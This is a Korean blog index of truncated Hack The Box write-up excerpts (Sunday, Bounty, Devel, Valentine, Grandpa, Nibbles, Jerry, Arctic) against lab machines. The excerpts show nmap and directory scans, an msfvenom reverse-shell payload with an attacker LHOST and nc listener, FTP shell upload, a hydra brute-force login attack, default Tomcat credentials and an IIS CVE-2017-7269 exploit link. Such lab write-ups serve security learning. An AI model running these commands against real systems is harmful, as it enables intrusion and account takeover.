Wargame
-
[HTB] Sunday WriteupWargame/Hack The Box 2022. 2. 6. 14:24
nmap -sC -sS -sV -O -p- -o scanResultFull.txt 10.129.152.134 finger service 공격 https://book.hacktricks.xyz/pentesting/pentesting-finger 79 - Pentesting Finger - HackTricks Finger is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office locati..
-
[HTB] Bounty WriteupWargame/Hack The Box 2022. 2. 5. 16:24
nmap -sC -sS -sV -O -p- -o scanResultFull.txt 10.129.151.89 80포트가 활성화 되어있어서 접근해보았다. 해당 이미지 외에 별도의 취약 포인트를 찾을 수 없는듯 하여 dirb와 gobuster를 통해 조사해보았다. dirb http://10.129.151.223/ -X .php,.txt,.aspx,.conf -o dirbResult.txt gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.129.151.223/ -x php,txt,conf,aspx -o bigList transfer.aspx와 /uploadedfiles/가 존재함을 확인했다. t..
-
[HTB] Devel WriteupWargame/Hack The Box 2022. 2. 3. 21:32
nmap -sC -sS -sV -O -p- -o scanResultFull.txt 10.129.150.253 ftp에 anonymous 계정으로 접근 가능하므로 리버스쉘을 업로드 하자. msfvenom -p windows/shell_reverse_tcp LHOST="10.10.14.114" LPORT=1234 -f aspx > reverseShell.aspx ftp put reverseShell.aspx nc -nvlp 1234 권한 상승을 위해 systeminfo 정보 저장 후 wes.py를 통해 유효한 취약점을 찾아보았다. python3 wes.py systeminfo.txt -i "priv" 그 중 40564.c를 활용하기로 했으며 문서에 안내되어있는대로 컴파일을 했다. i686-w64-mingw3..
-
[HTB] Valentine WriteupWargame/Hack The Box 2022. 1. 29. 23:19
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.182.216 nmap -O -sU -p- -o scanResultUdp.txt 10.129.182.216 nmap -sC -sS -sV -O -F 10.129.182.216 dirb, niko를 통해 활성화 되어있는 웹서비스에서 취약점이 존재하는지 찾아보았다. dirb http://10.129.182.216/ -o dirbResult.txt nikto -h 10.129.182.216 -p 80 -output niktoResult.txt /dev/ 파라미터에 접근해보니 hype_key, notes.txt 파일이 있었다. 그 중 hype_key 파일의 내용은 아래와 같았다. 2d 2d 2d 2d 2d 42 45 47 4..
-
[HTB] Grandpa WriteupWargame/Hack The Box 2022. 1. 27. 19:38
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.95.233 I활성화 되어있는 80포트에서 IS httpd 6.0 서비스를 사용중인걸 알 수 있었고, 접근해보니 아래와 같은 페이지가 나타났다. IIS 6.0 exploit 등 키워드로 검색 결과 아래 레퍼런스를 얻을 수 있었고, 리버스 쉘을 획득하는데 성공했다. https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell GitHub - g0rx/iis6-exploit-2017-CVE-2017-7269: iis6 exploit 2017 CVE-2017-7269 iis6 exploit 2017 CVE-2017-7269..
-
[HTB] Nibbles WriteupWargame/Hack The Box 2022. 1. 23. 21:12
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.180.107 80포트로 접근해보니 아래와 같은 페이지가 안내되었고, /nibbleblog/ 디렉토리에는 다음과같은 블로그페이지가 있었다. 경로에 /admin~ 이 존재하는 것을 보고 접근해보니 디렉토리인덱싱이 발생하는것을 확인 할 수있었다. 또한, 별도의 admin.php 페이지가 존재했다. hydra tool을 활용하여 관리자 계정에 대해 Bruteforce 공격을 해보았지만, 반복횟수에 따른 제한이 있는지 접근이 제한되어버렸다. hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.129.182.134 http-post-form "/nibbleblog/admin.php:..
-
[HTB] Jerry WriteupWargame/Hack The Box 2022. 1. 22. 21:32
공격 대상에 대한 정보를 획득하기 위해 포트스캐닝을 수행해보자. nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.1.110 유일하게 열려있는 8080 포트에 접근해보니, Apache Tomcat 디폴트 페이지가 나왔다. 관리자 페이지의 디폴트 주소인 /manager 에 접근해보니 계정 정보를 요구했다. 기본 관리자 계정 정보인 admin / admin 으로 로그인 하니, 아래와 같은 페이지가 나타났고, manager-gui의 계정 정보를 확인 할 수 있었다. ( tomcat / s3cret ) 다시 로그인 하면 아래와같은 gui 관리자 페이지가 나타난다. 관리자는 war 파일을 통해 업로드를 할 수 있으므로, war형식의 리버스 쉘 파일을 생성했다. msfvenom..
-
[HTB] Arctic WriteupWargame/Hack The Box 2022. 1. 19. 06:58
nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.177.205 처음에는 msrpc 위주로 삽질을 해봤지만 큰 성과가 없었다. 8500포트에 대해서는 확실한정보가 주어지지 않았길래, 웹 브라우저를 통해 접근해보았다. 아래와 같은 페이지가 나타났다.(userfiles 디렉토리는 공격 이후 공격으로 인해 생성된 디렉토리이다.) 차근차근 디렉토리들을 탐색해 봤더니(요청하나당 10초이상 걸려서 힘들었다ㅠ) 아래와같은 페이지를 발견할수있었다. ADOBE coldfusion 8 서비스라는 것을 알게되었으니 활용할만한 취약점이 있나 확인해보았다. searchsploit coldfusion 8 RCE 공격이 가능한 exploit 코드가 있길래, 이를 활용해보기로 했다. search..